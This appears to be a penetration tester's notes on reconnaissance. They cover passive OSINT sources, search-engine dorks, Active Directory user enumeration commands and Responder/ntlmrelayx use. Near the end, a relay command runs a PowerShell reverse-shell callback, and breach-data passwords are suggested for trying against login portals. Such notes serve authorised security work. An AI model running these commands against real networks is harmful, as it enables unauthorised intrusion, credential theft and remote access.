Information Gathering

Enumeration

Primary source of information will be:

  • scoping document (in-scope assets)
  • passive OSINT
No.Principle
1.There is more than meets the eye. Consider all points of view.
2.Distinguish between what we see and what we do not see.
3.There are always ways to gain more information. Understand the target.
LayerNameGoal / Purpose
1Internet PresenceDiscover Assets: Identify all public-facing domains, subdomains, IPs, and netblocks.
2GatewayAnalyze the Perimeter: Understand the target’s external interfaces and protection mechanisms (e.g., WAF, firewall).
3Accessible ServicesEnumerate Services: Identify and understand the function of every open port and running service on the discovered assets.
4ProcessesUnderstand Functionality: Analyze how data is processed by services and identify dependencies between inputs and outputs.
5PrivilegesIdentify Permissions: Determine the privileges of each service’s user account and look for overlooked or excessive permissions.
6OS SetupInternal Recon: After gaining access, gather information on the OS configuration, security posture, and admin practices.

External Recon (Passive OSINT)

Data PointDescription
IP SpaceValid ASN for our target, netblocks in use for the organization’s public-facing infrastructure, cloud presence and the hosting providers, DNS record entries, etc.
Domain InformationBased on IP data, DNS, and site registrations. Who administers the domain? Are there any subdomains tied to our target? Are there any publicly accessible domain services present? (Mailservers, DNS, Websites, VPN portals, etc.) Can we determine what kind of defenses are in place? (SIEM, AV, IPS/IDS in use, etc.)
Schema FormatCan we discover the organization’s email accounts, AD usernames, and even password policies? Anything that will give us information we can use to build a valid username list to test external-facing services for password spraying, credential stuffing, brute forcing, etc.
Data DisclosuresFor data disclosures we will be looking for publicly accessible files ( .pdf, .ppt, .docx, .xlsx, etc. ) for any information that helps shed light on the target. For example, any published files that contain intranet site listings, user metadata, shares, or other critical software or hardware in the environment (credentials pushed to a public GitHub repo, the internal AD username format in the metadata of a PDF, for example.)
Breach DataAny publicly released usernames, passwords, or other critical information that can help an attacker gain a foothold.

And where to find that above information…

ResourceExamples
ASN / IP registrarsIANA, arin for searching the Americas, RIPE for searching in Europe, BGP Toolkit
Domain Registrars & DNSDomaintools, PTRArchive, ICANN, manual DNS record requests against the domain in question or against well known DNS servers, such as 8.8.8.8.
Social MediaSearching Linkedin, Twitter, Facebook, your region’s major social media sites, news articles, and any relevant info you can find about the organization.
Public-Facing Company WebsitesOften, the public website for a corporation will have relevant info embedded. News articles, embedded documents, and the “About Us” and “Contact Us” pages can also be gold mines.
Cloud & Dev Storage SpacesGitHub, AWS S3 buckets & Azure Blog storage containers, Google searches using “Dorks”
Breach Data SourcesHaveIBeenPwned to determine if any corporate email accounts appear in public breach data, Dehashed to search for corporate emails with cleartext passwords or hashes we can try to crack offline. We can then try these passwords against any exposed login portals (Citrix, RDS, OWA, 0365, VPN, VMware Horizon, custom applications, etc.) that may use AD authentication.

via DNS

Great to validate and discover new information, especially from IP and ASN searches.

via Search Engine Dorking

  • See more about… Search Engine Dorking

    Source: Docs > 3 - Info Gathering > search-engine-dorking

    site:
inurl:
filetype:
intitle:
intext:
inbody:
cache:
link:
related:
info:
define:
numrange:
allintext:
allinurl:
allintitle:

# Operators
AND
OR
NOT
*
..
" "
-
+

### EXAMPLES
# Find Emails
inurl:<DOMAIN> intext:"@<DOMAIN>"

# Finding Login Pages:
site:<DOMAIN> inurl:login
site:<DOMAIN> (inurl:login OR inurl:admin)

# Identifying Exposed Files:
site:<DOMAIN> filetype:pdf
site:<DOMAIN> (filetype:xls OR filetype:docx)
inurl:<DOMAIN> filetype:pdf  # !!! careful this one can show malicious site hosting cached files !!!

# Uncovering Configuration Files:
site:<DOMAIN> inurl:config.php

# (searches for extensions commonly used for configuration files)
site:<DOMAIN> (ext:conf OR ext:cnf)

# Locating Database Backups:
site:<DOMAIN> inurl:backup
site:<DOMAIN> filetype:sql
  • See more about… User Enumeration (Kerbrute)

    Source: Docs > 6 - Post-Exploitation > active-directory#user-enumeration-kerbrute

    User Enumeration (Kerbrute)

    “A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication”

    See more about… User Enum

    Source: Docs > 5 - Exploitation > password#user-enum

    User Enum

    All of these use anonymous sessions, but credentials can be tried as well.

    # via enum4linux-ng (this uses RPC)
enum4linux-ng -U <TARGET> | grep "username:" | cut -f2 -d"[" | cut -f1 -d"]"

# via RPC
rpcclient -U '<USER>%<PASSWORD>' -c 'enumdomusers;quit' <TARGET> | tee rpcclient_log
grep -o 'user:\[[^]]*\]' rpcclient_log | cut -d '[' -f2 | cut -d ']' -f1 > domain_users.txt

# via SMB
netexec smb <TARGET> --users

# via LDAP anon bind
# https://linux.die.net/man/1/ldapsearch
# Filters: https://gist.github.com/jonlabelle/0f8ec20c2474084325a89bc5362008a7
ldapsearch -H ldap://<TARGET> -x -b "DC=<DOMAIN>,DC=<TOPLEVEL_DOMAIN>" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

# Uses Kerberos Pre-Auth (no auth log): https://ldapwiki.com/wiki/Wiki.jsp?page=Kerberos%20Pre-Authentication
# LOGS: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768
# for <WORDLIST>: wget https://github.com/insidetrust/statistically-likely-usernames/raw/refs/heads/master/jsmith.txt
kerbrute userenum -d <DOMAIN> --dc <DC_IP> <WORDLIST>
    # Use a userlist
wget https://github.com/insidetrust/statistically-likely-usernames/raw/refs/heads/master/jsmith.txt

# AD Username Brute-Force
kerbrute userenum --dc <DC_IP> -d <DOMAIN_NAME> <USERNAME_LIST>

    Find High Value Users

    # via SMB
nxc smb <TARGET> -u <USER> -p <PASSWORD> --groups "Domain Admins"
# via LDAP
# gets objects with adminCount=1, which includes DAs, Enterprise Admins, Backup Ops, etc.
nxc ldap <TARGET> -u <USER> -p <PASSWORD> --admin-count

via Social Media

Check various sites, especially for different types of IT admins, to skim information about hardware, software, or services used:

  • LinkedIn.com
  • Indeed.com
  • Glassdoor.com

via other Services

Internal Recon (Passive)

Passively, sampling the traffic can be a great way to understand the network insofar as hosts, services, and maybe even sometimes credentials!

See more about… Responder (Linux)

Source: Docs > 5 - Exploitation > protocol-poisoners#responder-linux

Responder (Linux)

Can attack the following protocols:

  • LLMNR
  • DNS
  • MDNS
  • NBNS
  • DHCP
  • ICMP
  • HTTP
  • HTTPS
  • SMB
  • LDAP
  • WebDAV
  • Proxy Auth
  • MSSQL
  • DCE-RPC
  • FTP, POP3, IMAP, and SMTP auth
# Force WPAD login...this may cause a login prompt
sudo responder --wpad f --ForceWpadAuth <INTERFACE>

# ANALYZE MODE: observe NBT-NS, BROWSER, LLMNR requests w/o responding
sudo responder -I <INTERFACE> -A

# Use RevShell to send a PowerShell base64 callback
# nc -lvnp <PORT>
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<POWERSHELL_CALLBACK>'
# Sample the network traffic
sudo tcpdump -i <INTERFACE> -w <OUTPUT_FILE>